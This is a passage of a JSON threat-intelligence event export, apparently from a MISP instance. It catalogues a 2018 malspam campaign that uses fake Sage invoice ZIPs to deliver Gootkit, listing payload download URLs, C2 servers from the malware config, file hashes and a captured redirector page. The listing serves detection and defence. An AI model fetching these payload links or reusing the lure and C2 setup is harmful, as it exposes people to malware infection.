 103 |                 "ShadowAttribute": []
 104 |             },
 105 |             {
 106 |                 "id": "71455",
 107 |                 "type": "url",
 108 |                 "category": "Network activity",
 109 |                 "to_ids": true,
 110 |                 "uuid": "5b355032-b59c-4dc5-b0b2-055cc0a8a8de",
 111 |                 "event_id": "2879",
 112 |                 "distribution": "5",
 113 |                 "timestamp": "1530220594",
 114 |                 "comment": "Link in Spam",
 115 |                 "sharing_group_id": "0",
 116 |                 "deleted": false,
 117 |                 "disable_correlation": false,
 118 |                 "object_id": "0",
 119 |                 "object_relation": null,
 120 |                 "value": "https:\/\/dupratconcept.com\/sign\/",
 121 |                 "ShadowAttribute": []
 122 |             },
 123 |             {
 124 |                 "id": "71456",
 125 |                 "type": "domain|ip",
 126 |                 "category": "Network activity",
 127 |                 "to_ids": true,
 128 |                 "uuid": "5b355074-3fb4-487c-aa42-0560c0a8a8de",
 129 |                 "event_id": "2879",
 130 |                 "distribution": "5",
 131 |                 "timestamp": "1530220660",
 132 |                 "comment": "Used for link in Spam",
 133 |                 "sharing_group_id": "0",
 134 |                 "deleted": false,
 135 |                 "disable_correlation": false,
 136 |                 "object_id": "0",
 137 |                 "object_relation": null,
 138 |                 "value": "funparc.fr|217.160.0.30",
 139 |                 "ShadowAttribute": []
 140 |             },
 141 |             {
 142 |                 "id": "71457",
 143 |                 "type": "domain|ip",
 144 |                 "category": "Network activity",
 145 |                 "to_ids": true,
 146 |                 "uuid": "5b355074-c694-4c5b-925c-0560c0a8a8de",
 147 |                 "event_id": "2879",
 148 |                 "distribution": "5",
 149 |                 "timestamp": "1530220660",
 150 |                 "comment": "Used for link in Spam",
 151 |                 "sharing_group_id": "0",
 152 |                 "deleted": false,
 153 |                 "disable_correlation": false,
 154 |                 "object_id": "0",
 155 |                 "object_relation": null,
 156 |                 "value": "dupratconcept.com|217.160.0.30",
 157 |                 "ShadowAttribute": []
 158 |             },
 159 |             {
 160 |                 "id": "71458",
 161 |                 "type": "domain|ip",
 162 |                 "category": "Network activity",
 163 |                 "to_ids": true,
 164 |                 "uuid": "5b355074-ee88-4141-98cc-0560c0a8a8de",
 165 |                 "event_id": "2879",
 166 |                 "distribution": "5",
 167 |                 "timestamp": "1530220660",
 168 |                 "comment": "Used for link in Spam",
 169 |                 "sharing_group_id": "0",
 170 |                 "deleted": false,
 171 |                 "disable_correlation": false,
 172 |                 "object_id": "0",
 173 |                 "object_relation": null,
 174 |                 "value": "greenparc-labaule.com|217.160.0.30",
 175 |                 "ShadowAttribute": []
 176 |             },
 177 |             {
 178 |                 "id": "71459",
 179 |                 "type": "domain|ip",
 180 |                 "category": "Network activity",
 181 |                 "to_ids": true,
 182 |                 "uuid": "5b355074-1230-4f21-b279-0560c0a8a8de",
 183 |                 "event_id": "2879",
 184 |                 "distribution": "5",
 185 |                 "timestamp": "1530220660",
 186 |                 "comment": "Used for link in Spam",
 187 |                 "sharing_group_id": "0",
 188 |                 "deleted": false,
 189 |                 "disable_correlation": false,
 190 |                 "object_id": "0",
 191 |                 "object_relation": null,
 192 |                 "value": "dupratconcept.com|217.160.0.30",
 193 |                 "ShadowAttribute": []
 194 |             },
 195 |             {
 196 |                 "id": "71460",
 197 |                 "type": "url",
 198 |                 "category": "Network activity",
 199 |                 "to_ids": true,
 200 |                 "uuid": "5b35510f-b0e4-4727-bf91-3bbfc0a8a8de",
 201 |                 "event_id": "2879",
 202 |                 "distribution": "5",
 203 |                 "timestamp": "1530220815",
 204 |                 "comment": "JS payload (Gootkit)",
 205 |                 "sharing_group_id": "0",
 206 |                 "deleted": false,
 207 |                 "disable_correlation": false,
 208 |                 "object_id": "0",
 209 |                 "object_relation": null,
 210 |                 "value": "http:\/\/pclink.fr\/boutique2\/gbe.exe?GLHWBt",
 211 |                 "ShadowAttribute": []
 212 |             },
 213 |             {
 214 |                 "id": "71461",
 215 |                 "type": "url",
 216 |                 "category": "Network activity",
 217 |                 "to_ids": true,
 218 |                 "uuid": "5b35510f-9aa0-473b-80a9-3bbfc0a8a8de",
 219 |                 "event_id": "2879",
 220 |                 "distribution": "5",
 221 |                 "timestamp": "1530220815",
 222 |                 "comment": "JS payload (Gootkit)",
 223 |                 "sharing_group_id": "0",
 224 |                 "deleted": false,
 225 |                 "disable_correlation": false,
 226 |                 "object_id": "0",
 227 |                 "object_relation": null,
 228 |                 "value": "http:\/\/idstocks.fr\/gbe.exe?rmJltaR",
 229 |                 "ShadowAttribute": []
 230 |             },
 231 |             {
 232 |                 "id": "71462",
 233 |                 "type": "url",
 234 |                 "category": "Network activity",
 235 |                 "to_ids": true,
 236 |                 "uuid": "5b3551bd-7fb4-4683-af4f-055fc0a8a8de",
 237 |                 "event_id": "2879",
 238 |                 "distribution": "5",
 239 |                 "timestamp": "1530220989",
 240 |                 "comment": "Zipped-JS",
 241 |                 "sharing_group_id": "0",
 242 |                 "deleted": false,
 243 |                 "disable_correlation": false,
 244 |                 "object_id": "0",
 245 |                 "object_relation": null,
 246 |                 "value": "http:\/\/comparin-esthetique.fr\/PDF\/\/download.php",
 247 |                 "ShadowAttribute": []
 248 |             },
 249 |             {
 250 |                 "id": "71463",
 251 |                 "type": "url",
 252 |                 "category": "Network activity",
 253 |                 "to_ids": true,
 254 |                 "uuid": "5b3551bd-fb6c-4af2-aae7-055fc0a8a8de",
 255 |                 "event_id": "2879",
 256 |                 "distribution": "5",
 257 |                 "timestamp": "1530220989",
 258 |                 "comment": "Zipped-JS",
 259 |                 "sharing_group_id": "0",
 260 |                 "deleted": false,
 261 |                 "disable_correlation": false,
 262 |                 "object_id": "0",
 263 |                 "object_relation": null,
 264 |                 "value": "http:\/\/alexandrearchitecte.fr\/download.php",
 265 |                 "ShadowAttribute": []
 266 |             },
 267 |             {
 268 |                 "id": "71464",
 269 |                 "type": "url",
 270 |                 "category": "Network activity",
 271 |                 "to_ids": true,
 272 |                 "uuid": "5b3551bd-1414-402b-9253-055fc0a8a8de",
 273 |                 "event_id": "2879",
 274 |                 "distribution": "5",
 275 |                 "timestamp": "1530220989",
 276 |                 "comment": "Zipped-JS",
 277 |                 "sharing_group_id": "0",
 278 |                 "deleted": false,
 279 |                 "disable_correlation": false,
 280 |                 "object_id": "0",
 281 |                 "object_relation": null,
 282 |                 "value": "http:\/\/dupratconcept.com\/\/wp-snapshots\/\/download.php",
 283 |                 "ShadowAttribute": []
 284 |             },
 285 |             {
 286 |                 "id": "71465",
 287 |                 "type": "url",
 288 |                 "category": "Network activity",
 289 |                 "to_ids": true,
 290 |                 "uuid": "5b3551bd-1278-4f48-b4a0-055fc0a8a8de",
 291 |                 "event_id": "2879",
 292 |                 "distribution": "5",
 293 |                 "timestamp": "1530220989",
 294 |                 "comment": "Zipped-JS",
 295 |                 "sharing_group_id": "0",
 296 |                 "deleted": false,
 297 |                 "disable_correlation": false,
 298 |                 "object_id": "0",
 299 |                 "object_relation": null,
 300 |                 "value": "http:\/\/funparc.fr\/laod2\/A\/zY8Wjn9qQd29fXL3XSWPVu8B7zY8Wjn9qQd29fXL3XSWPVu8B7\/download.php?log-on=Conf.Commande",
 301 |                 "ShadowAttribute": []
 302 |             },
 303 |             {
 304 |                 "id": "71466",
 305 |                 "type": "url",
 306 |                 "category": "Network activity",
 307 |                 "to_ids": true,
 308 |                 "uuid": "5b3551bd-e0b0-416d-8904-055fc0a8a8de",
 309 |                 "event_id": "2879",
 310 |                 "distribution": "5",
 311 |                 "timestamp": "1530220989",
 312 |                 "comment": "Zipped-JS",
 313 |                 "sharing_group_id": "0",
 314 |                 "deleted": false,
 315 |                 "disable_correlation": false,
 316 |                 "object_id": "0",
 317 |                 "object_relation": null,
 318 |                 "value": "http:\/\/dupratconcept.com\/folder\/A\/\/Zgdn8KrDOKXyMHj0jGWXGldRzZgdn8KrDOKXyMHj0jGWXGldRz\/download.php?log-on=Conf.Commande",
 319 |                 "ShadowAttribute": []
 320 |             },
 321 |             {
 322 |                 "id": "71492",
 323 |                 "type": "pattern-in-memory",
 324 |                 "category": "Payload installation",
 325 |                 "to_ids": false,
 326 |                 "uuid": "5b355620-058c-4448-8033-055fc0a8a8de",
 327 |                 "event_id": "2879",
 328 |                 "distribution": "5",
 329 |                 "timestamp": "1530222112",
 330 |                 "comment": "Gootkit Config",
 331 |                 "sharing_group_id": "0",
 332 |                 "deleted": false,
 333 |                 "disable_correlation": false,
 334 |                 "object_id": "0",
 335 |                 "object_relation": null,
 336 |                 "value": "affiliate_id: 1001\r\nc2: https:\/\/un1.pureperformanceparts.com:80\r\nc2: https:\/\/1nu.pureperformanceparts.uk:80\r\nc2: https:\/\/crucialtrk.com:80\r\nc2: https:\/\/atlantic-electrics.com:80\r\nc2: https:\/\/bussinesmobile.co.uk:80",
 337 |                 "ShadowAttribute": []
 338 |             },
 339 |             {
 340 |                 "id": "71505",
 341 |                 "type": "domain",
 342 |                 "category": "Network activity",
 343 |                 "to_ids": true,
 344 |                 "uuid": "5b3556b6-fcd4-4370-b4c3-055fc0a8a8de",
 345 |                 "event_id": "2879",
 346 |                 "distribution": "5",
 347 |                 "timestamp": "1530222262",
 348 |                 "comment": "Gootkit C2 (from Config)",
 349 |                 "sharing_group_id": "0",
 350 |                 "deleted": false,
 351 |                 "disable_correlation": false,
 352 |                 "object_id": "0",
 353 |                 "object_relation": null,
 354 |                 "value": "bussinesmobile.co.uk",
 355 |                 "ShadowAttribute": []
 356 |             },
 357 |             {
 358 |                 "id": "71506",
 359 |                 "type": "pattern-in-traffic",
 360 |                 "category": "Network activity",
 361 |                 "to_ids": false,
 362 |                 "uuid": "5b356b1c-9020-4a49-837b-3bbfc0a8a8de",
 363 |                 "event_id": "2879",
 364 |                 "distribution": "5",
 365 |                 "timestamp": "1530227484",
 366 |                 "comment": "Example of Response from Initial Redirector",
 367 |                 "sharing_group_id": "0",
 368 |                 "deleted": false,
 369 |                 "disable_correlation": false,
 370 |                 "object_id": "0",
 371 |                 "object_relation": null,
 372 |                 "value": "HTTP\/1.1 200 OK\r\nContent-Type: text\/html\r\nConnection: keep-alive\r\nKeep-Alive: timeout=15\r\nDate: Thu, 28 Jun 2018 20:32:48 GMT\r\nServer: Apache\r\nLast-Modified: Thu, 28 Jun 2018 07:30:15 GMT\r\nETag: W\/\"d4-56faeb3d8cb96\"\r\nContent-Length: 212\r\n\r\n    Veuillez patienter. Chargement de votre facture Sage ....\r\n<html>\r\n<head>\r\n\r\n<meta http-equiv=\"refresh\" content=\"1; URL=http:\/\/alexandrearchitecte.fr\/download.php\">\r\n<\/head>\r\n\r\n<body>\r\n<\/body>\r\n\r\n<\/html>",
 373 |                 "ShadowAttribute": []
 374 |             }
 375 |         ],
 376 |         "ShadowAttribute": [],
 377 |         "RelatedEvent": [
 378 |             {
 379 |                 "Event": {
 380 |                     "id": "2821",
 381 |                     "date": "2018-06-06",
 382 |                     "threat_level_id": "1",
 383 |                     "info": "malspam_2018-06-06_1",
 384 |                     "published": true,
 385 |                     "uuid": "5b179a7f-2fa4-4464-8c85-4d87c0a8a8de",
 386 |                     "analysis": "2",
 387 |                     "timestamp": "1528279095",
 388 |                     "distribution": "2",
 389 |                     "org_id": "1",
 390 |                     "orgc_id": "1",
 391 |                     "Org": {
 392 |                         "id": "1",
 393 |                         "name": "DNC",
 394 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 395 |                     },
 396 |                     "Orgc": {
 397 |                         "id": "1",
 398 |                         "name": "DNC",
 399 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 400 |                     }
 401 |                 }
 402 |             }
 403 |         ],
 404 |         "Galaxy": [],
 405 |         "Object": [
 406 |             {
 407 |                 "id": "790",
 408 |                 "name": "file",
 409 |                 "meta-category": "file",
 410 |                 "description": "File object describing a file with meta-information",
 411 |                 "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
 412 |                 "template_version": "3",
 413 |                 "event_id": "2879",
 414 |                 "uuid": "5b3551f6-67f8-4b95-a10a-3bbfc0a8a8de",
 415 |                 "timestamp": "1530221046",
 416 |                 "distribution": "5",
 417 |                 "sharing_group_id": "0",
 418 |                 "comment": "Facture_Sage_N789e-71981914.zip",
 419 |                 "deleted": false,
 420 |                 "ObjectReference": [],
 421 |                 "Attribute": [
 422 |                     {
 423 |                         "id": "71467",
 424 |                         "type": "md5",
 425 |                         "category": "Payload delivery",
 426 |                         "to_ids": true,
 427 |                         "uuid": "5b3551f6-3560-4cce-879b-3bbfc0a8a8de",
 428 |                         "event_id": "2879",
 429 |                         "distribution": "5",
 430 |                         "timestamp": "1530221046",
 431 |                         "comment": "",
 432 |                         "sharing_group_id": "0",
 433 |                         "deleted": false,
 434 |                         "disable_correlation": false,
 435 |                         "object_id": "790",
 436 |                         "object_relation": "md5",
 437 |                         "value": "4602569e121831852ea303b22501681b",
 438 |                         "ShadowAttribute": []
 439 |                     },
 440 |                     {
 441 |                         "id": "71468",
 442 |                         "type": "sha256",
 443 |                         "category": "Payload delivery",
 444 |                         "to_ids": true,
 445 |                         "uuid": "5b3551f6-60dc-4160-8266-3bbfc0a8a8de",
 446 |                         "event_id": "2879",
 447 |                         "distribution": "5",
 448 |                         "timestamp": "1530221046",
 449 |                         "comment": "",
 450 |                         "sharing_group_id": "0",
 451 |                         "deleted": false,
 452 |                         "disable_correlation": false,
 453 |                         "object_id": "790",
 454 |                         "object_relation": "sha256",
 455 |                         "value": "035416a693cff236b091f632adbea07a54177307348fde182760cf0fb8183044",
 456 |                         "ShadowAttribute": []
 457 |                     },
 458 |                     {
 459 |                         "id": "71469",
 460 |                         "type": "filename",
 461 |                         "category": "Payload delivery",
 462 |                         "to_ids": true,
 463 |                         "uuid": "5b3551f6-2b80-41da-bed8-3bbfc0a8a8de",
 464 |                         "event_id": "2879",
 465 |                         "distribution": "5",
 466 |                         "timestamp": "1530221046",
 467 |                         "comment": "",
 468 |                         "sharing_group_id": "0",
 469 |                         "deleted": false,
 470 |                         "disable_correlation": true,
 471 |                         "object_id": "790",
 472 |                         "object_relation": "filename",
 473 |                         "value": "Facture_Sage_N789e-71981914.zip",
 474 |                         "ShadowAttribute": []
 475 |                     },
 476 |                     {
 477 |                         "id": "71470",
 478 |                         "type": "sha1",
 479 |                         "category": "Payload delivery",
 480 |                         "to_ids": true,
 481 |                         "uuid": "5b3551f6-401c-4724-8784-3bbfc0a8a8de",
 482 |                         "event_id": "2879",
 483 |                         "distribution": "5",
 484 |                         "timestamp": "1530221046",
 485 |                         "comment": "",
 486 |                         "sharing_group_id": "0",
 487 |                         "deleted": false,
 488 |                         "disable_correlation": false,
 489 |                         "object_id": "790",
 490 |                         "object_relation": "sha1",
 491 |                         "value": "c2f01b9568bef488399b74a22c26d0a02393d1b4",
 492 |                         "ShadowAttribute": []
 493 |                     },
 494 |                     {
 495 |                         "id": "71471",
 496 |                         "type": "size-in-bytes",
 497 |                         "category": "Other",
 498 |                         "to_ids": false,
 499 |                         "uuid": "5b3551f6-5924-4809-9853-3bbfc0a8a8de",
 500 |                         "event_id": "2879",
 501 |                         "distribution": "5",
 502 |                         "timestamp": "1530221046",
 503 |                         "comment": "",
 504 |                         "sharing_group_id": "0",
 505 |                         "deleted": false,
 506 |                         "disable_correlation": false,
 507 |                         "object_id": "790",
 508 |                         "object_relation": "size-in-bytes",
 509 |                         "value": "5989",
 510 |                         "ShadowAttribute": []
 511 |                     }
 512 |                 ]
 513 |             },
 514 |             {
 515 |                 "id": "791",
 516 |                 "name": "file",
 517 |                 "meta-category": "file",
 518 |                 "description": "File object describing a file with meta-information",
 519 |                 "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
 520 |                 "template_version": "3",
 521 |                 "event_id": "2879",
 522 |                 "uuid": "5b35522c-8428-4b49-9636-055ec0a8a8de",
 523 |                 "timestamp": "1530221100",
 524 |                 "distribution": "5",
 525 |                 "sharing_group_id": "0",
 526 |                 "comment": "Facture_sage_1D5M4L2SZE-26071231.zip",
 527 |                 "deleted": false,
 528 |                 "ObjectReference": [],
 529 |                 "Attribute": [
 530 |                     {
 531 |                         "id": "71472",
 532 |                         "type": "md5",
 533 |                         "category": "Payload delivery",
 534 |                         "to_ids": true,
 535 |                         "uuid": "5b35522c-e21c-4fe4-b68a-055ec0a8a8de",
 536 |                         "event_id": "2879",
 537 |                         "distribution": "5",
 538 |                         "timestamp": "1530221100",
 539 |                         "comment": "",
 540 |                         "sharing_group_id": "0",
 541 |                         "deleted": false,
 542 |                         "disable_correlation": false,
 543 |                         "object_id": "791",
 544 |                         "object_relation": "md5",
 545 |                         "value": "bc28b53c282e5d0122be340f24a814a5",
 546 |                         "ShadowAttribute": []
 547 |                     },
 548 |                     {
 549 |                         "id": "71473",
 550 |                         "type": "sha256",
 551 |                         "category": "Payload delivery",
 552 |                         "to_ids": true,
 553 |                         "uuid": "5b35522c-7404-4b7a-b9f7-055ec0a8a8de",
 554 |                         "event_id": "2879",
 555 |                         "distribution": "5",
 556 |                         "timestamp": "1530221100",
 557 |                         "comment": "",
 558 |                         "sharing_group_id": "0",
 559 |                         "deleted": false,
 560 |                         "disable_correlation": false,
 561 |                         "object_id": "791",
 562 |                         "object_relation": "sha256",
 563 |                         "value": "b10998f0f751449a2e9931304ba0236b47595ae0fea827dbce0f3df8cf6d47b9",
 564 |                         "ShadowAttribute": []
 565 |                     },
 566 |                     {
 567 |                         "id": "71474",
 568 |                         "type": "filename",
 569 |                         "category": "Payload delivery",
 570 |                         "to_ids": true,
 571 |                         "uuid": "5b35522c-c0c8-4ef3-9169-055ec0a8a8de",
 572 |                         "event_id": "2879",
 573 |                         "distribution": "5",
 574 |                         "timestamp": "1530221100",
 575 |                         "comment": "",
 576 |                         "sharing_group_id": "0",
 577 |                         "deleted": false,
 578 |                         "disable_correlation": true,
 579 |                         "object_id": "791",
 580 |                         "object_relation": "filename",
 581 |                         "value": "Facture_sage_1D5M4L2SZE-26071231.zip",
 582 |                         "ShadowAttribute": []
 583 |                     },
 584 |                     {
 585 |                         "id": "71475",
 586 |                         "type": "sha1",
 587 |                         "category": "Payload delivery",
 588 |                         "to_ids": true,
 589 |                         "uuid": "5b35522c-55e8-4033-ab61-055ec0a8a8de",
 590 |                         "event_id": "2879",
 591 |                         "distribution": "5",
 592 |                         "timestamp": "1530221100",
 593 |                         "comment": "",
 594 |                         "sharing_group_id": "0",
 595 |                         "deleted": false,
 596 |                         "disable_correlation": false,
 597 |                         "object_id": "791",
 598 |                         "object_relation": "sha1",
 599 |                         "value": "1afc7681bda475eb75fdd3363fd9e6bbc4a22fdd",
 600 |                         "ShadowAttribute": []
 601 |                     },
 602 |                     {
 603 |                         "id": "71476",
 604 |                         "type": "size-in-bytes",
 605 |                         "category": "Other",
 606 |                         "to_ids": false,
 607 |                         "uuid": "5b35522c-c414-4eae-8155-055ec0a8a8de",
 608 |                         "event_id": "2879",
 609 |                         "distribution": "5",
 610 |                         "timestamp": "1530221100",
 611 |                         "comment": "",
 612 |                         "sharing_group_id": "0",
 613 |                         "deleted": false,
 614 |                         "disable_correlation": true,
 615 |                         "object_id": "791",
 616 |                         "object_relation": "size-in-bytes",
 617 |                         "value": "3976",
 618 |                         "ShadowAttribute": []
 619 |                     }
 620 |                 ]
 621 |             },
 622 |             {
 623 |                 "id": "792",
 624 |                 "name": "file",
 625 |                 "meta-category": "file",
 626 |                 "description": "File object describing a file with meta-information",
 627 |                 "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
 628 |                 "template_version": "3",
 629 |                 "event_id": "2879",
 630 |                 "uuid": "5b355252-a4a4-4b8c-a7c2-0640c0a8a8de",
 631 |                 "timestamp": "1530221138",
 632 |                 "distribution": "5",
 633 |                 "sharing_group_id": "0",
 634 |                 "comment": "Facture_sage_1D5M4L2SZE-18938684.zip",
 635 |                 "deleted": false,
 636 |                 "ObjectReference": [],
 637 |                 "Attribute": [
 638 |                     {
 639 |                         "id": "71477",
 640 |                         "type": "md5",
 641 |                         "category": "Payload delivery",
 642 |                         "to_ids": true,
 643 |                         "uuid": "5b355252-d6b8-4095-95c8-0640c0a8a8de",
 644 |                         "event_id": "2879",
 645 |                         "distribution": "5",
 646 |                         "timestamp": "1530221138",
 647 |                         "comment": "",
 648 |                         "sharing_group_id": "0",
 649 |                         "deleted": false,
 650 |                         "disable_correlation": false,
 651 |                         "object_id": "792",
 652 |                         "object_relation": "md5",
 653 |                         "value": "30da51d7f8872546d3d73c9beb8d70dd",
 654 |                         "ShadowAttribute": []
 655 |                     },
 656 |                     {
 657 |                         "id": "71478",
 658 |                         "type": "sha256",
 659 |                         "category": "Payload delivery",
 660 |                         "to_ids": true,
 661 |                         "uuid": "5b355252-963c-440c-a0d4-0640c0a8a8de",
 662 |                         "event_id": "2879",
 663 |                         "distribution": "5",
 664 |                         "timestamp": "1530221138",
 665 |                         "comment": "",
 666 |                         "sharing_group_id": "0",
 667 |                         "deleted": false,
 668 |                         "disable_correlation": false,
 669 |                         "object_id": "792",
 670 |                         "object_relation": "sha256",
 671 |                         "value": "c08151547796eed953b72a0966c526d0a3cc4db25ef5c31d6aa0c0dd6bc0b4a9",
 672 |                         "ShadowAttribute": []
 673 |                     },
 674 |                     {
 675 |                         "id": "71479",
 676 |                         "type": "filename",
 677 |                         "category": "Payload delivery",
 678 |                         "to_ids": true,
 679 |                         "uuid": "5b355252-8508-48f4-935e-0640c0a8a8de",
 680 |                         "event_id": "2879",
 681 |                         "distribution": "5",
 682 |                         "timestamp": "1530221138",
 683 |                         "comment": "",
 684 |                         "sharing_group_id": "0",
 685 |                         "deleted": false,
 686 |                         "disable_correlation": true,
 687 |                         "object_id": "792",
 688 |                         "object_relation": "filename",
 689 |                         "value": "Facture_sage_1D5M4L2SZE-18938684.zip",
 690 |                         "ShadowAttribute": []
 691 |                     },
 692 |                     {
 693 |                         "id": "71480",
 694 |                         "type": "sha1",
 695 |                         "category": "Payload delivery",
 696 |                         "to_ids": true,
 697 |                         "uuid": "5b355252-d484-4f65-98b7-0640c0a8a8de",
 698 |                         "event_id": "2879",
 699 |                         "distribution": "5",
 700 |                         "timestamp": "1530221138",
 701 |                         "comment": "",
 702 |                         "sharing_group_id": "0",
 703 |                         "deleted": false,
 704 |                         "disable_correlation": false,
 705 |                         "object_id": "792",
 706 |                         "object_relation": "sha1",
 707 |                         "value": "1c9e2767aaf45bffeba5246236e6c927b9f389cc",
 708 |                         "ShadowAttribute": []
 709 |                     },
 710 |                     {
 711 |                         "id": "71481",
 712 |                         "type": "size-in-bytes",
 713 |                         "category": "Other",
 714 |                         "to_ids": false,
 715 |                         "uuid": "5b355252-0b38-47e8-8c47-0640c0a8a8de",
 716 |                         "event_id": "2879",
 717 |                         "distribution": "5",
 718 |                         "timestamp": "1530221138",
 719 |                         "comment": "",
 720 |                         "sharing_group_id": "0",
 721 |                         "deleted": false,
 722 |                         "disable_correlation": true,
 723 |                         "object_id": "792",
 724 |                         "object_relation": "size-in-bytes",
 725 |                         "value": "3891",
 726 |                         "ShadowAttribute": []
 727 |                     }
 728 |                 ]
 729 |             },
 730 |             {
 731 |                 "id": "793",
 732 |                 "name": "file",
 733 |                 "meta-category": "file",
 734 |                 "description": "File object describing a file with meta-information",
 735 |                 "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
 736 |                 "template_version": "3",
 737 |                 "event_id": "2879",
 738 |                 "uuid": "5b355283-bdf8-4ba5-b98f-055cc0a8a8de",
 739 |                 "timestamp": "1530221187",
 740 |                 "distribution": "5",
 741 |                 "sharing_group_id": "0",
 742 |                 "comment": "Facture_sage_QEM4L23ZE-19659965.zip",
 743 |                 "deleted": false,
 744 |                 "ObjectReference": [],
 745 |                 "Attribute": [
 746 |                     {
 747 |                         "id": "71482",
 748 |                         "type": "md5",
 749 |                         "category": "Payload delivery",
 750 |                         "to_ids": true,
 751 |                         "uuid": "5b355283-762c-440b-ac64-055cc0a8a8de",
 752 |                         "event_id": "2879",
 753 |                         "distribution": "5",
 754 |                         "timestamp": "1530221187",
 755 |                         "comment": "",
 756 |                         "sharing_group_id": "0",
 757 |                         "deleted": false,
 758 |                         "disable_correlation": false,
 759 |                         "object_id": "793",
 760 |                         "object_relation": "md5",
 761 |                         "value": "3a855195ad2df37c31ee97debbd5554e",
 762 |                         "ShadowAttribute": []
 763 |                     },
 764 |                     {
 765 |                         "id": "71483",
 766 |                         "type": "sha256",
 767 |                         "category": "Payload delivery",
 768 |                         "to_ids": true,
 769 |                         "uuid": "5b355283-39e4-4c50-9702-055cc0a8a8de",
 770 |                         "event_id": "2879",
 771 |                         "distribution": "5",
 772 |                         "timestamp": "1530221187",
 773 |                         "comment": "",
 774 |                         "sharing_group_id": "0",
 775 |                         "deleted": false,
 776 |                         "disable_correlation": false,
 777 |                         "object_id": "793",
 778 |                         "object_relation": "sha256",
 779 |                         "value": "5597d4c8bcd25739fba86cf31c9b410017ee484017d03a272054007654263f1c",
 780 |                         "ShadowAttribute": []
 781 |                     },
 782 |                     {
 783 |                         "id": "71484",
 784 |                         "type": "filename",
 785 |                         "category": "Payload delivery",
 786 |                         "to_ids": true,
 787 |                         "uuid": "5b355283-3ab0-4a07-897e-055cc0a8a8de",
 788 |                         "event_id": "2879",
 789 |                         "distribution": "5",
 790 |                         "timestamp": "1530221187",
 791 |                         "comment": "",
 792 |                         "sharing_group_id": "0",
 793 |                         "deleted": false,
 794 |                         "disable_correlation": true,
 795 |                         "object_id": "793",
 796 |                         "object_relation": "filename",
 797 |                         "value": "Facture_sage_QEM4L23ZE-19659965.zip",
 798 |                         "ShadowAttribute": []
 799 |                     },
 800 |                     {
 801 |                         "id": "71485",
 802 |                         "type": "sha1",
 803 |                         "category": "Payload delivery",
 804 |                         "to_ids": true,
 805 |                         "uuid": "5b355283-0344-4010-a7f6-055cc0a8a8de",
 806 |                         "event_id": "2879",
 807 |                         "distribution": "5",
 808 |                         "timestamp": "1530221187",
 809 |                         "comment": "",
 810 |                         "sharing_group_id": "0",
 811 |                         "deleted": false,
 812 |                         "disable_correlation": false,
 813 |                         "object_id": "793",
 814 |                         "object_relation": "sha1",
 815 |                         "value": "c2043e0fd63a3c8d022d5acb430f51a587f5d1b5",
 816 |                         "ShadowAttribute": []
 817 |                     },
 818 |                     {
 819 |                         "id": "71486",
 820 |                         "type": "size-in-bytes",
 821 |                         "category": "Other",
 822 |                         "to_ids": false,
 823 |                         "uuid": "5b355283-49c0-4e82-b273-055cc0a8a8de",
 824 |                         "event_id": "2879",
 825 |                         "distribution": "5",
 826 |                         "timestamp": "1530221187",
 827 |                         "comment": "",
 828 |                         "sharing_group_id": "0",
 829 |                         "deleted": false,
 830 |                         "disable_correlation": true,
 831 |                         "object_id": "793",
 832 |                         "object_relation": "size-in-bytes",
 833 |                         "value": "4007",
 834 |                         "ShadowAttribute": []
 835 |                     }
 836 |                 ]
 837 |             },
 838 |             {
 839 |                 "id": "794",
 840 |                 "name": "file",
 841 |                 "meta-category": "file",
 842 |                 "description": "File object describing a file with meta-information",
 843 |                 "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
 844 |                 "template_version": "3",
 845 |                 "event_id": "2879",
 846 |                 "uuid": "5b3553dd-e640-4d06-9168-0560c0a8a8de",
 847 |                 "timestamp": "1530221533",
 848 |                 "distribution": "5",
 849 |                 "sharing_group_id": "0",
 850 |                 "comment": "gbe.exe",
 851 |                 "deleted": false,
 852 |                 "ObjectReference": [],
 853 |                 "Attribute": [
 854 |                     {
 855 |                         "id": "71487",
 856 |                         "type": "md5",
 857 |                         "category": "Payload delivery",
 858 |                         "to_ids": true,
 859 |                         "uuid": "5b3553dd-d044-4cc7-8dcf-0560c0a8a8de",
 860 |                         "event_id": "2879",
 861 |                         "distribution": "5",
 862 |                         "timestamp": "1530221533",
 863 |                         "comment": "",
 864 |                         "sharing_group_id": "0",
 865 |                         "deleted": false,
 866 |                         "disable_correlation": false,
 867 |                         "object_id": "794",
 868 |                         "object_relation": "md5",
 869 |                         "value": "cbb89f87b6a621d70c8525658fa714e2",
 870 |                         "ShadowAttribute": []
 871 |                     },
 872 |                     {
 873 |                         "id": "71488",
 874 |                         "type": "sha256",
 875 |                         "category": "Payload delivery",
 876 |                         "to_ids": true,
 877 |                         "uuid": "5b3553dd-9280-4ce3-a9bb-0560c0a8a8de",
 878 |                         "event_id": "2879",
 879 |                         "distribution": "5",
 880 |                         "timestamp": "1530221533",
 881 |                         "comment": "",
 882 |                         "sharing_group_id": "0",
 883 |                         "deleted": false,
 884 |                         "disable_correlation": false,
 885 |                         "object_id": "794",
 886 |                         "object_relation": "sha256",
 887 |                         "value": "4b7eb0bc19c8c9d00bd51a65243c21b87e5b5fcca087564591c999b460c0dfd4",
 888 |                         "ShadowAttribute": []
 889 |                     },
 890 |                     {
 891 |                         "id": "71489",
 892 |                         "type": "filename",
 893 |                         "category": "Payload delivery",
 894 |                         "to_ids": true,
 895 |                         "uuid": "5b3553dd-5cac-47e3-a0e8-0560c0a8a8de",
 896 |                         "event_id": "2879",
 897 |                         "distribution": "5",
 898 |                         "timestamp": "1530221533",
 899 |                         "comment": "",
 900 |                         "sharing_group_id": "0",
 901 |                         "deleted": false,
 902 |                         "disable_correlation": true,
 903 |                         "object_id": "794",
 904 |                         "object_relation": "filename",
 905 |                         "value": "gbe.exe",
 906 |                         "ShadowAttribute": []
 907 |                     },
 908 |                     {
 909 |                         "id": "71490",
 910 |                         "type": "sha1",
 911 |                         "category": "Payload delivery",
 912 |                         "to_ids": true,
 913 |                         "uuid": "5b3553dd-7d1c-4c5c-a0a2-0560c0a8a8de",
 914 |                         "event_id": "2879",
 915 |                         "distribution": "5",
 916 |                         "timestamp": "1530221533",
 917 |                         "comment": "",
 918 |                         "sharing_group_id": "0",
 919 |                         "deleted": false,
